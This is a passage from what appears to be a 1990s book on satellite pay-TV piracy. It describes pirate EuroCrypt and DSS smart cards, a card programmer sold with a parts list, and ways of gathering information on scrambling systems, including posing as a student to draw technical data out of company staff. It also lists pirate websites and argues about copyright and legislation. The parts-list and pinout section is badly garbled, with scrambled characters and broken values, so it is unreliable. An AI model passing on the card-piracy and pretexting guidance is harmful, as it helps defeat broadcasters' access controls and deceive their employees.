work in another dealer's card. The 
COP8782 based card was 
intended to be more secure than 
the preceeding PIC16C84 cards. 
However the COP8782 was 


popped. 
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the EEPROM. Rather than try and decrypt the EEPROM contents, the 
COP8782 was targeted. The attempt was successful. 


The move to the COP8782 was significant in that it was applying secure key 
distribution techniques to a chaotic market. The contents of the EEPROM 
were encrypted with a DES like algorithm. The decryption key was dealer 
specific. This meant that an EEPROM upgrade for one dealer would not 
work in another dealer's cards. 


The fact that this type of hack is possible gives some view of how 
completely the D2-MAC EuroCrypt system is compromised. Ordinarily a 
system should be capable of using Electronic CounterMeasures, (ECMs). In 
fact the best example of this was the VideoCrypt 09 system. The best 
analogy for the 09 VideoCrypt card when it was compromised was a 
cornered rat - extremely dangerous and very unpredictable. News Datacom 
were able to implement some very nasty ECMs including one that wiped a 
section of memory in one of the pirate battery cards. However the D2-MAC 
EuroCrypt system seems to have none of the elegance and resilience of 
VideoCrypt. The designers of EuroCrypt seem never to have contemplated 
the possibility of the cards being hacked. As a result, the ECMs seem to be 
limited to Key changes. Of course thanks to the specifications being 
published the hackers and pirates have an almost complete understanding 
of the system. 


The COP8782 is an unusual choice as a microcontroller. The type used was 
the OTP version and therefore it could not be reprogrammed. The reason 
for this choice seems to have been partly that it was a more secure chip 
than the PIC16C84 and partly because the only thing that pirate EuroCrypt 
cards had to cope with was key changes. 


Changing the keys on the COP cards is simply a case of reprogramming the 
EEPROMs. Of course it does require that the new keys have been 
encrypted with the dealer key used in the COP8782 on the card. The 
reprogramming can be carried out using a PIC16C84 programmer. The 
programs for programming the 24C16 and 24C65 EEPROMs are widely 
available on the internet and specialist BBSes. 
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Battery Cards 


The pirate market in Europe is an internecine one. Pirates prey upon other 
pirate designs. As a result of this, the larger pirates moved to a more secure 
microcontroller. The move away from the PIC16C84, which had been the 
foundation of the pirate smart card industry was long overdue. 


The secure microcontroller chosen was the Dallas 5002FP. This chip is an 
8051 type microcontroller but it has some security elements that made it far 
more secure than even the smart cards used by the channels in Europe. 


The address bus and the data in the chip are encrypted with what is 
believed to be a DES like algorithm. Whereas with some 8051 microcontrol- 
lers the code could easily be popped by spoofing the microcontroller, the 
Dallas 5002FP does not seem to have that problem. 


The main battery cards used in Europe, (dealt with in greater depth in 
Chapter 7), use a largely similar design with a Dallas 5002 FP with two 32K 
RAM chips. 


A later design, the Cardtronics AO Amiga uses a 128 K RAM. The Megatek 
and Cardtronics models were upgraded to emulate the Sky 10 card. It 
required an additional ASIC board to emulate the ASIC in the official Sky 
card. 


The European battery cards have key pads. This means that the card user 
can enter the update codes into the card manually via the on-card keyboard 
or, as in a later innovation, via the remote control. The evolution of the 
battery card in the US seems to have little in common with the European 
situation. 


The initial pirate DSS battery card was based on the Dallas 5002FP. There 
appeared to be some sort of split among the designers of the original 
battery card. The result was that a number of designs appeared on the 
market. Some of the newer variants did not use the Dallas 5002FP. One of 
the rumours about this was that the DirecTv and News Datacom security 
people were monitoring sales of the Dallas 5002FP. However a more 
plausible reason for the change is that the European pirates were buying 
most of the Dallas 5002FP chips. The circuit given here is that of one of the 
newer DSS battery card variants. It uses the Dallas 5000T and an ATMEL 
АТ89С51 microcontroller. Programming is by means of an edge connector. 
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The МК8 - A Commercial Interface 


The МК8 by Paul Maxwell-King is perhaps one of the best examples of how 
the Season Interface, the Phoenix Interface and a PIC programmer can be 
integrated. The software for using the device is freely available on the 
internet and the specialist BBSes. The design files for the interface, some of 
which are reproduced here, are also available on Paul Maxwell-King's 
WWW site (http://www.gpl.net/paulmax). The interface can be purchased 
ready built as interface/controller/programmer or as the interface only. It is 
also possible to purchase the PCB only. Ordering details are below. 





If you want to order the interface my email address is paul@maxking.de- 
mon.co.uk 


PLEASE MAKE SURE YOU INCLUDE YOUR EMAIL ADDRESS! 

Or send cheque, cash, bankers draft or postal order. (All above must be in 
Sterling.) Cash payment, bankers draft or Postal order allows us to despatch 
order IMMEDIATELY, Cheques will take normaly 5 Days before despatch. 
1 Halmshaw Terrace, 

Bentley, 

Doncaster, 

South Yorkshire, 

England. 

DNS OBD. 

Make payment payable to Paul Maxwell-King. 

On receipt of payment I will send the items First Class post. If you require 
an Invoice please state that in your snail mail to me. Please remember with 
an Invoice, your name and address will then be on our account records. 
Please enclose details of package i.e. 

Card reader and PIC /interface/Programmer/emulator 50 UK pounds 
Interface only 25 UK pounds 

Printed Circuit Board only 10 UK pounds 

Don’t forget YOUR RETURN ADDRESS, it would also be nice to have 
your telephone number for any problems. 

Its also advisable to include your email address if possible. 

DON'T FORGET ANY MORE THAN 3 METERS OF CABLE PLEASE 
ADD AN EXTRA £5.00 FOR ANY LENGTH ABOVE 3 METERS. SO IF 
YOU REQUIRE 5 METERS IT WILL BE £5.00 EXTRA 

**** POSTAGE IS INCLUDED IN THE PRICE **** 
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PIC chip on the underside 
of the PCB board. 
single PIC chip uses 
n4 for Reset 
Pin 5 for GND (бу) 
n 12 (RB6) for Clock 
Pin 13 (RB7) for Data 
14 for VDD (5v) 


1507816 & PIC r/Reader + PIC Card + PC Int та fae Clack igual 











ву] 0 Volt 
1 [| йезе! | [ FRW Voltage 
Clock | Bidirectional 





! 
TOTAL ISO CARD LENGTH — e Signal 1 К) Data at 9600 


Total Length from edge to components 92.5mm! 
Length of a ISO 7816 chip card is 85.60mm 





Top view of pcb showing layout of components. 


_— 4 = Reset from card to decoder switch (on/off) 
ЕНЕ: = Reset from card to pin 9 MAX232 IC switch (on/off) $ уан сотан pthc pes eee me 
“`2 7 Вз from pin 7 К5232 to pin 8 MAX232 IC switch (or/off) messe ie клен dn vis 
1 = 5 Volt power to oscillator and card reader (SC1) programmer. УУ k сей pta. Z)min Socket: 
4 SPST switch RS 337-548 £ 1.51 each Rai hinge cis eae 
ЕН паны Орн ое еда Чин терце 3504 КП м3 £0.15 each Š 
volts d.c. $ pin 4.1.1. ceramic package. output z + 
frequencies of 14.31818, 7.15909, 3.579545, [Ca] 3mm 5 Volt operating pcb single LED with integral 


resistor allowing direct connection to a 5 Volt supply. 
1.789772 MHz and 894.88, 447.44, 223.72, RS 197-097 £ 0.41 each 


111.860, 55.930 KHz RS 296-885 £ 3.37 each 
RS232 communications interfaces with a single "ATTL Series. Standard TTL logic ideal for use in 
+ 5 volt d.c. supply. Reciver outputs are 3 state basic circuits where speed of operation and power 
TIL / CMOS compatible with input levels of up consumption are not critical. Supply voltage 4.75 to 
to 30v. RS 655-290 £ 2.32 each 5.25 volts d.c. RS 306-336 £ 0.97 each 
16 pin 4.11. ceramic package. 14 pin d.i.l. ceramic package. 
сиз Ultra-miniature, washable switch, Vertical SPDT on-on Ө Voltage regulator, fixed SV SOmA output, with 
b ld tacts RS 664-200 £ 1.52 h reverse and thermal shutdown protection, short 

peu meeting gels мес er circuit current limit and 40V operating limit. 
Smart card connector, this is designed RS 411-860 £0.94 each ТО92 package. 
to interface with IC cards or'Smart!' © 1 off22K resistor RS 131-413 £ 0.028 each 
м Cards, they have 16 contacts which Other items needed to manufacture ISO device. 
C А R D cover the normal positions of up to 8 1 off 8 way DIL socket RS 402-759 £ 0.042 each 

eS connection pads per card. These 1 off 14 way DIL socket RS 402-765 £ 0.079 each 
Reader 

















1 off 16 way DIL socket RS 402-771 £ 0.091 each 
Se Бо. Ва азаа. oe way DIL socket RS 402787 £ 0.099 each 
range of applications such as:- бесшіу 1 off RS 232 9 pin D socket female RS 465-362 £ 0.42 each 


RS 453-785 access control, telecommunications, 1 off RS232 9 pin D hood RS 484-644 £ 0.918 each 
pi eac! 
Payment control, Retail sales, 1 off PIC16C84 chip RS 831-523 £ 7.10 each 
Metering, Machine process control. 1 off 3 meter length of 5 core cable 





Та. 
5С 1 For mainly internal usage with a 1 off small ty wrap for fixing cable to etched pcb 
normally closed card detection switch 2 off 2.2K resistor RS 131-299 £0.028 each 
nections 1 off 10K resistor RS 131-378 £ 0.028 each 
e Lil Lala 1 off PCB pin-strip header RS 334-555 £ 2.92 


[ Colour | connection [0 pin [25 pin | 1 off jumper links RS 334-561 £0.36 ( ) 
RXD recive 2 






[| «ж Red 
Black This ISO device is longer enough 
z^ Yellow to fit into a Pace MSS1000 
[| Z Blue satellite decoder. 
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5: The Information Wars 





The time just prior to the Renaissance must have been a lovely time 
for those in the Church. They, the hierarchy, controlled the flow of 
information. They stated God’s truth as they saw it and it was Law. 
No questions asked. 


Actually, “no questions asked” was more of an order. Anyone who 
did ask was dealt with quickly and, in most cases, finally. The 
society was based on a pyramid with the information providers at the 
top. 


It was pyramidal because in addition to the information, those at the 
top also controlled the means of production. Books and other 
publications were produced by a long and specialised process of 
copying. Then movable typeface was created by Johannes Guten- 
burg. 


The means of production of information was taken from those who 
had held sway and they never again regained that control. Informa- 
tion spread like wildfire. The fools even tried to ban books, which 
only had the effect of making them more sought after. 


Solidly held beliefs were questioned and smashed with facts. 
Simpleton lies designed to keep people subdued were seen as such. 


Gutenburg’s creation was stolen from him by a greedy creditor and a 
bunch of conniving lawyers. Gutenburg saw little if any of the 
profits from his creation and yet the bibles produced with his 
printing process were still called Gutenburg bibles. They even stole 
his name but history only remembers Gutenburg. 


One of the greatest revolutions in Human knowledge was based on 
the theft of intellectual property. 


The analogy may not be perfect. It may not even be totally accurate 
in places but it does illustrate two things perfectly: 


1. A monopoly on information is not indefinitely possible. 


2. All systems eventually break down. 
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Information Acquisition 


To the uninitiated, hackers seem to able to lift information about systems by 
magic. Marketing executives are particularly prone to this sort of paranoia, 
especially when they begin to believe their own advertising copy. About 
ninety eight per cent of the information required to hack a system is freely 
available. It is simply a question of knowing what to look for. 


The best place to hide something is in plain sight. This is a good example of 
lateral thinking. The searcher will be looking for something that is hidden 
and since the thing is not hidden he will not find it. Most of the time this line 
of thought appears to work. 


It has been said that electronics is merely a set of modules. Electronic 
engineering is knowing how to interface these modules. Hacking involves 
being able to take the modules apart and then put them back together. 


Continuing this line of thought, a scrambling system is an arrangement of 
modules that produces a specified output from a known input. Most 
systems designers will use a tried and tested module rather than developing 
a new one. With totally new circuitry the business people in the company will 
try to have the design patented. In doing so they provide the hacker with an 
easily accessible source of information. The companies often try to protect 
themselves by reducing the circuit to IC level. The hacker has the 
advantage of knowing that the development work was carried out using 
discrete circuitry or at least off-the-shelf componentry. 


In hacking, information is the most valuable commodity. Strangely for such 
a valuable commodity it is often badly protected. The actual term "Informa- 
tion Acquisition" is a catch all phrase. It basically covers information 
gathering, analysis, and no small bit of wizardry 


In order to acquire information, it is best to know where it lies. There are 
basically three types of information: published, electronic and and holistic. 
Ideally every piece of obtainable information on a system should be 
considered when assessing the security of that system. Basically the holistic 
approach is putting everything together, even the things that do not initially 
make sense. It is in reality a filtering process that will result in a valuable 
insight. 


Perhaps it is best described as a quest for information. Whether or not this 
information immediately makes sense is irrelevant. Sooner or later it will. 
The channels and the manufacturers will fight to keep this information 
secret. 
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Published Information Sources 


Published information is that derived from the technical and non-technical 
media. The brochures from the system manufacturers are also in this 
category. While the information in the technical and trade magazines is 
generally accurate there are a few journalists who are more a liability than 
asset as an information source. These journalists tend to work for the 
advertorial and social studies magazines. 


In satellite television and scrambling in Europe, there are basically a few 
magazines and newsletters that are essential. The first aperiodical newslet- 
ter is obviously Hack Watch News. This is the only newsletter on signal 
security in Europe. It is to paraphrase the MAD motto “First in a field of one.” 


“What Satellite” is perhaps one of the best gauges of the public perception 
of satellite television. It is a glossy magazine aimed at a general readership. 
The equipment reviews are good though have minimal technical content. Of 
late there have been a few good technically orientated articles. The news is 
generally culled from other sources but the strong point of the magazine is 
that it frequently carries excellent articles on programming. There is also a 
good column on satellite television DXing by Roger Bunney and readers 
constantly send in details and photographs of the weird and wonderful feeds 
that they have encountered. It is also the only UK satellite television 
magazine that has a WWW site. This fact alone puts it head and shoulders 
above its competitors. 


“Television” magazine is the UK’s leading magazine on television technol- 
ogy. It is read by most television engineers and technicians in Ireland and 
the UK. It is one of the most highly regarded magazines on the subject. 
Although it does not cover signal security, it does cover the technology of 
satellite television technology in addition to that of VCRs and other domestic 
electronics. It also has the longest running column on long distance TV 
reception by Roger Bunney which also covers unusual satellite television 
traffic. 


There are of course other magazines covering the business side of satellite 
and cable television. Among these are the titles Cable and Satellite Europe 
and Satellite and Cable Communications International. 


“Cable And Satellite Europe” was at one time the best satellite and cable 
magazine in the market. There was a balance between technology and 
business. Unfortunately this has changed for the worse over the last few 
years. It is now considered to be mainly an airhead magazine for the 
bizoids. Some hackers have even gone as far as to label it a room 


5-3 


5: The Information Wars 


temperature IQ magazine. This is of course overkill. The magazine 
frequently carries excellent articles on cable television and legislation. 


“Satellite Trader’ is the main installers magazine in the UK. It is not a 
technical magazine by any stretch of the imagination but it does have a few 
good articles every year. It is a useful magazine if you want to know what 
the channels and manufacturers are thinking as it frequently runs mundane 
pieces on industry personalities whose companies advertise in the maga- 
zine. However as regards signal security, it does not deal with the topic. It 
will have a WWW site in operation within the next few months. 


Many of the better mainland European magazines such as the German 
Tele-Satellit have excellent material available on the WWW. There is a 
general trend for the European magazines to have greater depth in their 
articles. This is especially the case with Infosat which seems to be one of 
the better technically orientated German satellite television magazines. 


Clearly the best European magazine on electronics is Elektor Electronics. It 
frequently covers the technology of satellite television in addition to all other 
areas of electronics. In the last few years it has carried articles on MAC, 
satellite receivers and outdoor electronics. 


Most companies in electronics crave publicity for their products and so will 
seize every opportunity for a bit of free advertising. Professional journals, 
that is those aimed specifically at engineers, designers and buyers, are the 
most reliable sources. Of course the best source of information comes from 
the specialist newsletters. It is often the case that these are very small 
operations where the editor is an expert on the subject. In some cases, the 
editor is the newsletter staff. This of course has caused massive problems 
where newsletters have been taken over and been repopulated with 
non-experts in the vain hope that it will be some reflection of glories past. 
Interventions of this type rarely have the same pace and level of insight. 


Some of the magazines intended for the public can contain some useful 
information but should be considered with caution as the data has been 
simplified possibly by someone has very little knowledge of scrambling 
systems. Newspapers can provide the names of the scrambling systems 
used by various cablenets. Generally it is the provincial papers that would 
carry this type of information though the national papers can sometimes 
pick it up. The person who gives this data to the journalist is almost 
invariably the system manager and non-technical. They love to boast about 
their brand new high security scrambling systems that will prevent the 
pirates from tapping their system. 
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The non-technical person can be one of the most helpful sources of 
information for the hacker. In system manufacturing companies, they 
generally offer to send you the full technical data and or brochures. With 
some it is better to be a student doing a project on scrambling systems as 
people generally like helping others. The non-technical person can give 
away the the full data and strengths of their scrambling systems without 
even knowing it. This kind of information acquisition has more to do with 
social engineering than published information. 


Electronic Information 


The electronic information sources are the more valuable. They are more 
immediate as the printed and video media is often between one week and 
three months out of date. The electronic information sources include bulletin 
boards and on-line information sources. 


The world of electronic information has been referred to in the Cyberpunk 
novels as “The Matrix”. This is a fairly accurate if somewhat poetic 
description. Most of the sources of electronic information are linked in some 
way. The commonest method of accessing the sources is via dial-up 
modem. Most people nowadays refer to all these interconnected systems 
as “The ‘Net’. Of course to limit things to the internet is misleading but there 
is a feeling that all the necessary information to hack a system is there. In 
some respects, especially where the hack is in the public domain, this is 
correct. 


There are basically two forms of electronic information sources; bulletin 
boards and the internet. Naturally with the rise of the internet, the bulletin 
board or BBS is beginning to take second place. 


At its minimum, a BBS is a computer, a hard disc and a modem. It is 
possible to dial in, leave messages and upload and download files. the files 
can be anything from porn to games programs. Most of the good 
generalised boards tend to have a wide mixture. 


Each country tends to have a number of specialised satellite television 
BBSes. Many of these BBSes charge an annual fee for complete access. 
This is because the costs of maintaining a BBS are generally high. 


Special Projects BBS (+353-51-850143) is a BBS that specialises in 
satellite and cable television and scrambling. Most of the information and 
files on this BBS are free. Some are only available to subscribers. 
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Usenet 


The BBS scene is small compared to the Internet. The BBSes normally 
have sysops to filter and select the files, the internet does not and as a 
result you often have to trawl through seas of files just to find what you want. 
Of course you could always use a search engine to locate information in a 
few seconds. 


There are many good books available about the internet among them Ed 
Krohl's "The Whole Internet User's Guide & Catalog". There аге a number 
of relevant newsgroups which cover satellite television. The best way to 
consider these is as realms of perpetual discussion. 


These newsgroups are like huge conversations in which anyone can 
partake. Naturally there are some newsgroups where people try to keep 
some semblance of order. You can find all levels of knowledge and if the 
question is properly framed people will try to answer. Of course the one 
question not to ask in alt.satellite.tv.crypt is "where is the SEASON software 
for Sky 10?". 


Most of the newsgroups have documents that will explain most questions. 
These documents or help files are known the FAQ. This is an acronym for 
Frequently Asked Questions. The alt.satellite.tv.crypt FAQ can be found on 
most good BBSes and FTP sites. It is also available on many WWW sites. 
The most recent edition is regularly posted on the following sites: 


http: //www.hackwatch. com/-kooltek/faq.htm1 
http://www.iol.ie/-kooltek/faq.htm] 


As with any specialised subject, satellite television has specific newsgroups. 
The most important newsgroups regarding satellite are: 


alt.satellite.tv.europe 


This is the original European satellite television newsgroup. The rise of the 
SEASON hacks and general discussion on scrambling systems and hacks 
forced a split and the creation of a new newsgroup, alt.satellite.tv.crypt. The 
main traffic in the tv.europe newsgroup relates to discussions of the 
technology of satellite television and programming. 


This group can average fifty messages a day but most are crossposted 
messages that also appear on the alt.satellite.tv.crypt newsgroup. 
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alt.satellite.tv.crypt 


This newsgroup was created when the traffic about hacking got too heavy 
for the original alt.satellite.tv.europe newsgroup. It is aimed at the discus- 
sion of scrambling systems and cryptography as applied to satellite 
television. Though normally it is a European newsgroup it has a reasonable 
proportion of North American readers. 


It does tend to attract a lot of adverts for pirate smart cards and 
programmers. Most of these devices are actually well made and work as 
advertised but as with most internet things, it is a case of caveat emptor. 


This newsgroup can have upwards of fifty messages a day so it is relatively 
mild in terms of traffic. This number can jump to two or three times that level 
when there has been a key change or a release of new decoding software. 


rec.video.satellite.europe 


This is the official newsgroup on satellite television in Europe. It is mainly 
concerned with the technology of satellite television, programming and 
links. It is not the newsgroup to post messages about scrambling systems 
and hacking. 


The traffic levels on this group has been traditionally low with most of the 
traffic appearing on the alt.satellite newsgroups. 


rec.video.satellite.dbs 


With the launch of Direct Broadcast Satellite television in North America, 
this newsgroup was created. Most of the traffic is about the DirecTv system 
though other systems are also covered. 


As this is a North American group, the traffic levels are correspondingly 
high. It is not unusual to see two hundred messages a day flowing through 
this newsgroup. 


rec.video.satellite.tvro 


This newsgroup is the North American newsgroup concerned with the big 
dishes and conventional satellite television systems, (C Band). There is not 
that much interest in the group in Europe since most of it is strictly 
Continental United States (CONUS). 


The traffic level on this newsgroup is high. This is one of the oldest 
newsgroups on the subject of satellite television. 
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The World Wide Web (WWW) 


This is most people's idea of the internet. It is basically a point and click 
environment where information is only a few keypress away. Of course you 
have got to know what keys to press and where to look. 


This is not a book on the internet. There are many books out there on how 
to set up an WWW browser and connect to an internet service provider. 
This is not one of them. The following assumes that you have got all of the 
browser and associated software running properly. 


There are basically two types of site accessible using a web browser; 
WWW and FTP. The WWW site is essentially a site that has documents, 
graphics and files. This data is arrayed in the form of pages. The highlighted 
text on these pages will allow you to access another page or download a file 
or see a picture. It is a wonderfully graphic environment. The FTP (File 
Transfer Protocol) site is basically a set of files that can be downloaded to 
your computer. The main thing you get here, if you are lucky is a screen full 
of text descriptions of what each file is. You can download the file to your 
computer just by double clicking on the highlighted name. 

The most important thing about the WWW is that it makes things easy. 
There is no more convoluted commands to remember, just addresses that 
almost resemble English. 


What follows is a list of the important WWW sites associated with 
scrambling systems. It is by no means complete and there are frequently 
links on the pages below that will get you to other similar pages. 

http: //www.hackwatch. com/-kooltek - Hack Watch News 

http: //ww.webshop.co.uk/wv/links.htm] - What Satellite 

http: //www.wrn.org/tesug/welcome.html - TESUG 

http: //www.scramblingnews.com - Scrambling News 

http: //ww.tele-satellit.com - Tele-Satellit 

http: //ww.gp1.net/paulmax 

http: //ww.paranoia.com/~defiant - Euro Satellite Hack Pages 
http: //ww.eurosat.com - Mirror of above with C+ ЈЕРЕС File 

http: //ww.xs4all1.n1/~ceylon - Voyager Homepage 

http: //www.cybercomm.n1l/-stegen - Multimac Homepage 
http://www.wu-wein.ac.at/usr/h91/h9151382/sat - Seasoned Mac 
http: //www.xs4all.nl/-pot/videocrypt.htm] 
http://www.iol.ie/-ctx - Cardtronics - Battery Card Dealer 
http://www.rwt.co.ul/rwthist.htm - Steve Birkill's TVROHistory 
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Legislation And Digital Television Piracy 


You only have to look at the Prohibition in the United States to see how 
effective strong legislation is. Indeed the present situation relating to 
narcotics laws and the availability of hard drugs is a more current example. 
Pay Television is not hard drugs. It does not kill. But have you ever heard of 
someone giving up television? 


As was explained elsewhere in this book, piracy is due mainly to lack of 
access. Regardless of whether the lack of access is due to the would-be 
viewer being outside the copyright area, or the programming being 
proscribed or the price of legitimate access being beyond most individuals, 
people will always find a way around a system. Human evolution is a history 
of finding new ways and shortcuts. Admittedly, the discovery of fire and 
finding a way to watch a scrambled porn channel are not quite equal in 
stature. 


Removing the copyright barriers would effectively stop most piracy immedi- 
ately. It would allow someone in Germany to subscribe to BSkyB or indeed 
someone in Ireland to subscribe to Canal Plus legally. Since the subscrip- 
tions in these examples would be legitimate, the channels would make 
money and the film producers would get their correct royalties. However 
until the fundamental injustice of fragmented copyrights in Europe is 
resolved, the present massive scale of piracy on channels will continue to 
exist. 


Now this might sound like | am blaming the film producers for producing a 
product that lends itself so easily to piracy. | am not. What 1 am saying is 
that the present fragmented copyright market is the primary reason for most 
of the piracy in Europe. It is the copyrights associations who impose these 
marketing practices that are to blame for this. Of course they do make more 
money by repeatedly selling the copyrights to a number of smaller and more 
fragmented markets. 


Before the whole matter of legislating for the protection of encrypted 
services, this matter of copyright has to be addressed. Otherwise there will 
be no real change in the levels of piracy other than the fact that it will be 
driven into the darker corners of the market and in some countries 
completely underground. Of course the widespread availability of internet 
access means that the whole piracy industry will probably be driven offshore 
out of EU jurisdiction. 


The best example of what can occur when the piracy situation is made very 
illegal is the present situation in the United States. Piracy of the VideoCipher 
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ІІ system is very much illegal. Of course that fact in itself has not stopped 
piracy. It has limited it somewhat but piracy still goes on. Most of the 
vendors of pirate devices have moved outside of US jurisdiction where they 
can continue to sell their devices. What may well happen with piracy on the 
European channels is that the pirates will move their operations outside of 
EU jurisdiction and the whole scene will continue without too much 
inconvenience to all except the channels. 


The European Green Paper, available on the usual satellite related WWW 
and FTP sites and also on the European Commission's WWW site, 
(http:/Awww.cec.lu/en/record/green.html) is a good attempt at trying to 
resolve a very complex situation. It is, however based on a lot of faulty 
information and is riddled with inaccuracies. Some of the arguments are so 
full of holes that they resemble activated charcoal. Perhaps a quotation from 
another Irish writer, Jonathan Swift, best describes it: 


As learned commentators view 

In Homer more than Homer knew, 
So geographers, in Afric-maps, 
With savage-pictures fill their gaps; 
And o’er unhabitable downs 

Place elephants for want of towns. 


In preparing the green paper, which is essentially a discussion document, 
the Commission had commissioned the reports from three independent 
firms. | have grave reservations as to whether the EC got good value for 
money. As regards the technical and economic reports, it might have been 
cheaper for them to have bought a copy of the Black Book. 


Indeed judging from some of the paragraph dealing with the economics of 
the detachable secure microcontroller, it looks like someone did. It is 
somewhat ironic. A book on piracy being pirated. But then there is no 
copyright on ideas otherwise these “consultancy” types would be in fatal 
trouble. It is of course common courtesy to acknowledge the source - 
something that they failed to do. In my opinion, the people who did the 
named reports were, in terms of piracy, complete and utter amateurs. They 
are outsiders who do not understand the causes of piracy, the technology of 
piracy or the ramifications of piracy. 


The theory that the people who carried out the consultancies are outsiders 
is strengthened by the statement that “Moreover, a specialist press has 
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developed around this pirate market, providing targeted publications and 
thus also a medium for the marketing of unauthorised devices.” 


It seems that they could not tell the difference between the satellite 
television press and the specialist press. The difference is clear to anyone 
involved with satellite television. The satellite television press has exploited 
the Blackbox industry, taking adverts from pirate card and pirate decoder 
manufacturers. In the UK, the satellite television magazines are far from 
specialised and could not by any stretch of the imagination be called 
"specialist". There has been a contraction of the technical press in the UK 
over the last few years. It seems that most of the magazines for the satellite 
television industry have been taken over by people with no real background 
in the subject. As a result they are purely businesses. It seems that the days 
where the satellite magazines were filled with good articles by people who 
actually cared about the subject are gone. It is left to at best a handful of 
people to write good articles for the rest is recycled press releases and 
prospective plant growth accelerant. 


Satellite television is essentially a highly complex commercial and technical 
subject. Basically it was a case of people with no technical knowledge 
getting into writing about satellite television. These people were basically 
reporters and just treated writing about satellite television as another job. 
They had no real enthusiasm for the subject. With the tougher financial 
climate of the last few years, these satellite television magazines tended to 
contract, using more of these staff reporters rather than specialists who 
knew the subject. After all it was cheaper to pay these reporters than pay 
specialists. There is no way that these UK magazines could be considered 
as "specialis. The real technical specialist press was not particularly 
associated with satellite television. The one magazine that is effectively the 
bible of television engineers and technicians is "Television". That magazine, 
while dealing with the electronics of satellite television has not actually 
covered the piracy aspect. At the other side of the market are the 
expensively priced weeklies and bi-weeklies, which offer some good 
analysis but again do not cover piracy or promote it. In the end, the main 
things that people buy the satellite television magazines for are the 
programme listings and the adverts. 


Of course most of the mainland European magazines are more technical. 
They could be considered to be of a more specialist nature but again they 
have taken the adverts for the pirate devices. However at heart they still 
remain magazines that are aimed at the general public that include some 
specialist articles. Therefore they could not be described as being the 
"specialist press". 
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Perhaps the specialist press that the EU green paper seems to be referring 
to is the Black Book and Hack Watch News. Of course it stopped short of 
actually naming the Black Book and Hack Watch News, the only specialist 
publications in Europe of its type. 


It is easy to see how people who are not involved with the industry could 
make such mistakes over what constitutes a specialist press. But other less 
apparent, and indeed more fundamental, errors emerge. Perhaps the 
indication is that on page 2, in their Executive Summary, they say that “a 
flourishing unofficial decoder manufacturing industry is emerging in parallel 
to that of authorised manufacturers.” The statement ignores realities. The 
main basis for piracy in Europe is pirate smartcards not decoders. Besides, 
the piracy business is not an emergent one. It has been existence for over 
ten years now. It is worth at least a few hundred Million pounds per year. 


The estimate that pirate devices represent 5 to 20% of the total number of 
devices in circulation is wrong. It is clearly much higher than this and it is 
impossible to get a totally accurate picture of the magnitude of the problem. 


What the paper conveniently ignores is that in areas where channels are not 
licensed to operate, the rate of piracy is 100% For a service like BSkyB, the 
tate of piracy in mainland Europe is technically 100% For Canal Plus, the 
rate of piracy in the UK is technically 100%. For FilmNet, the rate of piracy in 
France is 100%. 


Whoever supplied the figures on piracy does not have a clue as to the 
realities of the subject. Either that or the situation is consciously being 
misrepresented in order to make it seem like the problem of piracy is not as 
bad as it is. 


There is a subtle trick here that some would sooner call a lie. The more 
cynical amongst us would recognise it as a rationalisation. 


One of the most difficult things to do in satellite television is to quantify the 
effects of piracy on a channel. Getting a channel to comment on its piracy 
problem is even more difficult. This is because the channel, by means of 
rationalisations, will attempt to portray the effects of piracy as being less 
than they really are. 


However convincing these rationalisations sound, the do not cover up the 
fact that revenue is lost as a result of piracy. It is all a question of how the 
losses to revenue are calculated. More precisely it is a matter of who the 
person doing the calculations works for. 


Fragmented copyright areas are the main contributors to piracy on a 
channel. They are also the prime excuses for the channel to portray the 
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losses to revenue as being lower than they really are. The essential aspect 
here is how the loss is considered. Is it considered as a subscription that the 
channel has lost to the pirate or is it a subscription that the pirate has gained 
from the channel? The two are not the same. 


If a channel does not have the right to collect subscriptions in an area then a 
pirate card does not count as a subscription that the channel has lost to the 
pirate. The logic here is straightforward; the channel does not have the right 
to collect subscriptions so therefore how could it lose that which it is not 
entitled to? And so by this wide brushstroke, the channel can ignore all of 
the piracy outside its own copyright area. It was by this rationalisation that 
BSkyB’s management claimed on their flotation prospectus that they had no 
real piracy problem. The rest of the world wondered if they had spent too 
much time in Australia. 


Piracy within the channel's copyright area is more serious. The channel has 
the legal right to collect subscriptions in this area. If the channel loses a 
subscription to a pirate here then it is a very real loss. It is this figure that a 
channel will juggle with when trying to calculate the loss to piracy. Rarely, if 
ever, do they publish these calculations. 


With all those rationalisations and half-truths the only time that you can 
catch a glimpse of the the real piracy figures is immediately after a channel 
fixes the problem. Of course the channel will be overjoyed with this sudden 
increase in their subscription levels or at least that is what their press 
releases will say. The best example of this was recently provided by BSkyB. 


BSkyB had over the years of piracy that the 07 and 09 card issues spanned 
given a convincing impression of an ostrich. They stuck their corporate 
heads in the sand and tried hard not to comment on the piracy problem. A 
few brief leaks nearly gave the game away. One of these came as part of an 
affidavit by BSkyB’s deputy head of legal and business affairs. The affidavit 
was inaccurate about the scale of piracy in the UK but then BSkyB never 
really had a clue about the scale of the problem. What it did say was that 
BSkyB was confident of regaining users of pirate cards in the UK once a 
new card is introduced. 


In the last three months of 1995, BSkyB according to their own press 
release, obtained some 170000 new subscribers to their DTH services. 
What this release failed to say was that BSkyB had switched to a new card 
issue (10) on 31-10-95. 


Throughout the 09 period they were averaging a loss of of subscribers if the 
Over The Air traffic was anything to go by. The 09 card had been 
compromised since October 1994. This meant that there was a year of utter 
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piracy on the VideoCrypt system - a complete year of lost revenues in 
BSkyB’s copyright area and in the greater European market. 


This is where the figures become questionable. Or more precisely, this is 
where questionable figures become downright iffy. The normal reaction of 
the pirate viewers in the event of a card change is to acquire a legitimate 
card by Grey Market means. Or if they live in the UK or Ireland, they take 
out a legitimate subscription. Now how can a channel quantify the number 
of their subscribers who are really Grey Market subscribers? Could they 
stand to lose what could be a significant percentage of their subscribers? 


The problem here is whether these 170000 new subscribers were people 
who had resubscribed after dropping their subscriptions during the time the 
pirate cards were available or were genuine new subscribers. In realistic 
terms, BSkyB should have had at least 400000 new subscribers in the 
period if things had gone according to their theory. 


Given that the users of pirate cards had more confidence in the hackers and 
pirates, a lot of pirate card users would not have subscribed to the whole 
package. Instead they would have subscribed to the Multichannels and 
perhaps the sports channels. And what happened to the millions of viewers 
in Mainland Europe? Well if you believe the channel, they never existed. 
After all how could the channel lose money to pirates in these countries 
when they do not officially collect subscriptions. That is a problem for the 
copyrights associations, not the channels. The reason why things did not go 
according to BSkyB’s theory was because it the same movies are on the 
D2-MAC EuroCrypt channels which were still hacked. 


The speculation that the consumers would be misled over the provenance 
of the pirate devices is rather childish. It is a typical feint with the intention of 
drawing attention away from the fact that these people are plainly clueless. 
Most pirate devices are marketed as pirate devices. In fact it is often easier 
to purchase a pirate device than it is to purchase an official device. 


